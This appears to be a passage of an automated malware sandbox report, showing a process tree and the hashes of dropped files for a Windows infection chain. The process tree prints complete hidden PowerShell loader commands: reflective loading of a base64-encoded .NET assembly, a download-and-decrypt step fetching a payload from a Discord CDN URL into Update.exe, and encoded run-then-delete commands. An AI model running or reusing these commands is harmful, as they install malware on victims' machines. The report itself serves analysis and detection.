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')) | Out-Null; $f = 'C:\ProgramData\Update.exe';if (-not(Test-Path -Path $f -PathTy Leaf)){ try {$s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvMTAxNTYxMzU4MjM4MzI1OTc1OC8xMDE4OTkyNzc3NTY2MDk3NTM4L2Vycm9yLmxvZy4x')); Invoke-WebRequest $s -Outfile 'C:\ProgramData\log';[Helper.Helper]::Library($f,'C:\ProgramData\log','HelloWorldHelloWorldHelloWorldHelloWorld','30');}catch{}}else{}4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -v 4 -WindowStyle hidden -executionpolicy bypass -co "[Reflection.Assembly]::Load([Convert]::FromBase64String('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bWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAFJlc2l6ZQBFbmNvZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAFN0cmluZwBIZWxwZXIuZGxsAFN5c3RlbQBmbgBTeXN0ZW0uUmVmbGVjdGlvbgBIZWxwZXIALmN0b3IAU3lzdGVtLkRpYWdub3N0aWNzAHJvdW5kcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBSZWFkQWxsQnl0ZXMAV3JpdGVBbGxCeXRlcwBHZXRCeXRlcwBieXRlcwBGb3JtYXQAT2JqZWN0AENvbnZlcnQAU3lzdGVtLlRleHQAQXJyYXkAa2V5AExpYnJhcnkARW1wdHkAAAAAANgSYNXASRJBgn6FJp2AZgkABCABAQgDIAABBSABARERBCABAQ4EIAEBAgQHAR0FBQABHQUOBhABAB0eAAMKARwGAAIODh0cBAAAElEFIAEdBQ4EAAEIDgYAAgEOHQUEAAEBDgQHAgoKCRABAgEQHR4ACAMKAQUIt3pcVhk04IkEAAAAAAcABAEODg4OCgADHQUQHQUdBQkIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAAFAEAD1Rlc3RDb25zb2xlQXBwMQAABQEAAAAAFwEAEkNvcHlyaWdodCDCqSAgMjAyMgAAKQEAJDM1QTg1QjRGLTI1MzUtNDJCMi1BODY4LUQ0RkIyQTA4N0ZDNAAADAEABzEuMC4wLjAAAE0BABwuTkVURnJhbWV3b3JrLFZlcnNpb249djQuNy4yAQBUDhRGcmFtZXdvcmtEaXNwbGF5TmFtZRQuTkVUIEZyYW1ld29yayA0LjcuMgAAAABDc+3iAAAAAAIAAABhAAAAXCgAAFwKAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAUlNEUzF5QvUjcQNImTBTIFdjK54BAAAARTpcQ3J5cHRzXC1cRk9SIE1FIE9OTFkgISAtIC0gUG9seURlY3J5cHQgRExMXG9ialx4NjRcUmVsZWFzZVxIZWxwZXIucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAACwDAAAAAAAAAAAAACwDNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsASMAgAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAABoAgAAAQAwADAAMAAwADAANABiADAAAAAaAAEAAQBDAG8AbQBtAGUAbgB0AHMAAAAAAAAAIgABAAEAQwBvAG0AcABhAG4AeQBOAGEAbQBlAAAAAAAAAAAASAAQAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAFQAZQBzAHQAQwBvAG4AcwBvAGwAZQBBAHAAcAAxAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAuADAALgAwAAAANgALAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABIAGUAbABwAGUAcgAuAGQAbABsAAAAAABIABIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAgADIAMAAyADIAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAAD4ACwABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABIAGUAbABwAGUAcgAuAGQAbABsAAAAAABAABAAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAFQAZQBzAHQAQwBvAG4AcwBvAGwAZQBBAHAAcAAxAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==')) | Out-Null; $f = 'C:\ProgramData\Update.exe';if (-not(Test-Path -Path $f -PathTy Leaf)){ try {$s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvMTAxNTYxMzU4MjM4MzI1OTc1OC8xMDE4OTkyNzc3NTY2MDk3NTM4L2Vycm9yLmxvZy4x')); Invoke-WebRequest $s -Outfile 'C:\ProgramData\log';[Helper.Helper]::Library($f,'C:\ProgramData\log','HelloWorldHelloWorldHelloWorldHelloWorld','30');}catch{}}else{}5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -v 4 -WindowStyle hidden -executionpolicy bypass -encoded JABkACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAMgAxAHMAZwA0AC4AbABvAGcAJwA7ACQAZABhACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAZAA7AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAYQApACkAIAB8ACAATwB1AHQALQBOAHUAbABsADsAWwBDAC4AQwBsAGEAcwBzADEAXQA6ADoAUgB1AG4AKAApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABVAHAAZABhAHQAZQAuAGUAeABlACIAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGQA4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -v 4 -WindowStyle hidden -executionpolicy bypass -encoded JABkACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAMgAxAHMAZwA0AC4AbABvAGcAJwA7ACQAZABhACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAZAA7AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAYQApACkAIAB8ACAATwB1AHQALQBOAHUAbABsADsAWwBDAC4AQwBsAGEAcwBzADEAXQA6ADoAUgB1AG4AKAApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABVAHAAZABhAHQAZQAuAGUAeABlACIAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGQA5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Update.exe"C:\ProgramData\Update.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\b556d5b16e\orxds.exe"C:\Users\Admin\AppData\Local\Temp\b556d5b16e\orxds.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\1000019001\USBtoISOConverter.exe"4⤵
-
C:\Windows\system32\PING.EXEping 1.1.1.1 -n 1 -w 10005⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4808 -s 9122⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4808 -ip 48081⤵
-
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exeC:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 4162⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 228 -ip 2281⤵
-
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exeC:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 4162⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 752 -ip 7521⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\21sg4.logFilesize
10KB
MD5ac4358d2e39b42cfef2887b6766a63cb
SHA1e66f73c0af090610597ffee61c5b292a703c42ed
SHA256fb0bbdac464a97cbf25eca6ca8ae6aa422ba6945276bf34440b2a73b1e7118d5
SHA512686afe3090cf89e29900a7520885c61093eac0489c0b2bce98dff4f09f88fae57dbfafb174ec6d42a8613f75538bf1733b9efaff7cd0b79193ca1ddc7d64536d
-
C:\ProgramData\Update.exeFilesize
218KB
MD59512d156c84429d1854ac514ed428f22
SHA17b92f647f9606c3574b0ffb7d35a9a877ad1e18e
SHA2565e19869a01fa927d8cca4183f640e6ac75d28e99e4f9084d5b3bbd8b5341cef4
SHA51279a70c383eb2604d4a1cc67665f766d1e5ea45eb1e9e571c7f7fa86748037343b800bd1bb96e65dea9ee7bf50e28984cbd1be257590befd7977814ec12513855
-
C:\ProgramData\Update.exeFilesize
218KB
MD59512d156c84429d1854ac514ed428f22
SHA17b92f647f9606c3574b0ffb7d35a9a877ad1e18e
SHA2565e19869a01fa927d8cca4183f640e6ac75d28e99e4f9084d5b3bbd8b5341cef4
SHA51279a70c383eb2604d4a1cc67665f766d1e5ea45eb1e9e571c7f7fa86748037343b800bd1bb96e65dea9ee7bf50e28984cbd1be257590befd7977814ec12513855
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5a55804de6c5e4eab0462ff4ce48aa7ec
SHA1a3575216f15738da14ba6f8ce927aa1d97c0b1fb
SHA2563ce383be2760720f756cbe7f3dd60f891b46625de78e9f71d88e12d560743c73
SHA512e0d47633028118e8c1b2cb51a0727bde84eba44f031bfb868ef23fa7d48ca2fb04c9d35fbbdc498101c3156be1adbee0297fc662ffe1831a9cee002e56e2d45e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5f3c942a891ec381179b84401ee770b4c
SHA18fba91a8ba93ea39fdccf1b2b3c09ea755fdb577
SHA2569b871ad84265570aa0b3286115c527de9ad1fe1d37e768b12058cc95445d084c
SHA512223b4b9a471142240ed7e42f88f505c4df5a451546a78cfdccafb8794ad2b184f2cf6e4d24a55fe1d8b7a075255fe230cfbec86638444d065c34f007c6218de0
-
C:\Users\Admin\AppData\Local\Temp\1000011001\linda5.exeFilesize
1.5MB
MD5a951b3225db1b2e79eb76f5403ee18eb
SHA1cba2417769cb8172e7060e7c0e869a1a6a7ee0cc
SHA256b8098889539906bd82516c8d6609847832f48fea7c85e3d2d468b5c7a20daa97
SHA512cb4f63abe299a19be2a91876e4e50024999acf7938df1e1a53e1c88ed14b977fd132e2c4262948a44653879456ce70547bcbf152b85105eed93923079067ee4a
-
C:\Users\Admin\AppData\Local\Temp\1000011001\linda5.exeFilesize
1.5MB
MD5a951b3225db1b2e79eb76f5403ee18eb
SHA1cba2417769cb8172e7060e7c0e869a1a6a7ee0cc
SHA256b8098889539906bd82516c8d6609847832f48fea7c85e3d2d468b5c7a20daa97
SHA512cb4f63abe299a19be2a91876e4e50024999acf7938df1e1a53e1c88ed14b977fd132e2c4262948a44653879456ce70547bcbf152b85105eed93923079067ee4a
-
C:\Users\Admin\AppData\Local\Temp\1000012001\wish.exeFilesize
175KB
MD58b08fce2936c8363994dda1d6e9ddadf
SHA115cfdfe6e406c0e69d2e6261b898b97eed6f34e2
SHA2563f665abde637a3c65e46e96daeb9aa15c8dda5e2ed2fee15048d4fa790e66991
SHA512925ad9dbe1681a3494450978217c0dd98b637e681a9713280756908f444bef95cf9b9649aa80383561ec59b5951885901b16227e9853c1111a4271ab8e1d0b67
-
C:\Users\Admin\AppData\Local\Temp\1000012001\wish.exeFilesize
175KB
MD58b08fce2936c8363994dda1d6e9ddadf
SHA115cfdfe6e406c0e69d2e6261b898b97eed6f34e2
SHA2563f665abde637a3c65e46e96daeb9aa15c8dda5e2ed2fee15048d4fa790e66991
SHA512925ad9dbe1681a3494450978217c0dd98b637e681a9713280756908f444bef95cf9b9649aa80383561ec59b5951885901b16227e9853c1111a4271ab8e1d0b67
-
C:\Users\Admin\AppData\Local\Temp\1000013001\build333333.exeFilesize
2.9MB
MD5c9c15c4061ab4de4cb7c473c2760f923
SHA1e64cbcd186178d44a1e8584c417b7d865417be0b
SHA256d8e22530aa884e9e742a102f9acb53a2727b749dac4489c72b37782e2ec6383e
SHA5126fe139e6e5d7923b932938acfd32b041fb16dac5945c50ef81a5dd61563d0faf1ef1a97db28a9f23a40abfe2fe78f756477157a13b217f6cf199a5ec122ab367
-
C:\Users\Admin\AppData\Local\Temp\1000013001\build333333.exeFilesize
2.9MB
MD5c9c15c4061ab4de4cb7c473c2760f923
SHA1e64cbcd186178d44a1e8584c417b7d865417be0b
SHA256d8e22530aa884e9e742a102f9acb53a2727b749dac4489c72b37782e2ec6383e
SHA5126fe139e6e5d7923b932938acfd32b041fb16dac5945c50ef81a5dd61563d0faf1ef1a97db28a9f23a40abfe2fe78f756477157a13b217f6cf199a5ec122ab367
-
C:\Users\Admin\AppData\Local\Temp\1000019001\USBtoISOConverter.exeFilesize
252KB
MD5b9a11bdb88d21c6bbd5b575c96548075
SHA1c5096e8854febffcb65da55d2ee0b8ab6fc3c5e7
SHA256234b2eb65c442967ece3d92c1eb1c9c42a4a5ae6ea7e445a0994b746f656d8e3
SHA51235494ed5e5de8fbc76f5969c3e7473f43ac8ea5a027a8329607accf2668a8fb70e2e04019689e5bc10bb104abf3e5eea3aa11815a3cae8cb41f382288e9ef9a2
-
C:\Users\Admin\AppData\Local\Temp\1000019001\USBtoISOConverter.exeFilesize
252KB
MD5b9a11bdb88d21c6bbd5b575c96548075
SHA1c5096e8854febffcb65da55d2ee0b8ab6fc3c5e7
SHA256234b2eb65c442967ece3d92c1eb1c9c42a4a5ae6ea7e445a0994b746f656d8e3
SHA51235494ed5e5de8fbc76f5969c3e7473f43ac8ea5a027a8329607accf2668a8fb70e2e04019689e5bc10bb104abf3e5eea3aa11815a3cae8cb41f382288e9ef9a2
-
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exeFilesize
332KB
MD531d0310cd3d6d5e2e7c51508c12b25dd
SHA1c19664c55ede5d5411d348fae4832823b7085086
SHA256880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6
SHA5122015f457aa5daa7ce8460c954243184ec77187f1ad1d997167074f84a3d31b32bf55be08b0d6043f20ddee289e93809150cc0b966e277fa7d66fdb92d10b1c9c
-
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exeFilesize
332KB
MD531d0310cd3d6d5e2e7c51508c12b25dd
SHA1c19664c55ede5d5411d348fae4832823b7085086
SHA256880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6
SHA5122015f457aa5daa7ce8460c954243184ec77187f1ad1d997167074f84a3d31b32bf55be08b0d6043f20ddee289e93809150cc0b966e277fa7d66fdb92d10b1c9c
-
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exeFilesize
332KB
MD531d0310cd3d6d5e2e7c51508c12b25dd
SHA1c19664c55ede5d5411d348fae4832823b7085086
SHA256880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6
SHA5122015f457aa5daa7ce8460c954243184ec77187f1ad1d997167074f84a3d31b32bf55be08b0d6043f20ddee289e93809150cc0b966e277fa7d66fdb92d10b1c9c
-
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exeFilesize
332KB
MD531d0310cd3d6d5e2e7c51508c12b25dd
SHA1c19664c55ede5d5411d348fae4832823b7085086
SHA256880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6
SHA5122015f457aa5daa7ce8460c954243184ec77187f1ad1d997167074f84a3d31b32bf55be08b0d6043f20ddee289e93809150cc0b966e277fa7d66fdb92d10b1c9c
-
C:\Users\Admin\AppData\Local\Temp\b556d5b16e\orxds.exeFilesize
218KB
MD59512d156c84429d1854ac514ed428f22
SHA17b92f647f9606c3574b0ffb7d35a9a877ad1e18e
SHA2565e19869a01fa927d8cca4183f640e6ac75d28e99e4f9084d5b3bbd8b5341cef4
SHA51279a70c383eb2604d4a1cc67665f766d1e5ea45eb1e9e571c7f7fa86748037343b800bd1bb96e65dea9ee7bf50e28984cbd1be257590befd7977814ec12513855
-
C:\Users\Admin\AppData\Local\Temp\b556d5b16e\orxds.exeFilesize
218KB
MD59512d156c84429d1854ac514ed428f22
SHA17b92f647f9606c3574b0ffb7d35a9a877ad1e18e
SHA2565e19869a01fa927d8cca4183f640e6ac75d28e99e4f9084d5b3bbd8b5341cef4
SHA51279a70c383eb2604d4a1cc67665f766d1e5ea45eb1e9e571c7f7fa86748037343b800bd1bb96e65dea9ee7bf50e28984cbd1be257590befd7977814ec12513855
-
C:\Users\Admin\AppData\Local\Temp\uQwK5O.CPLFilesize
2.8MB
MD59859329af700af2cca4623587c54118f
SHA1db96dc960469d7af6b01e3369db73469fcfb543f
SHA256576d096f85e718193c3d14b828e2ab7d15edbbc996083a3b2d682bf93228f3ce
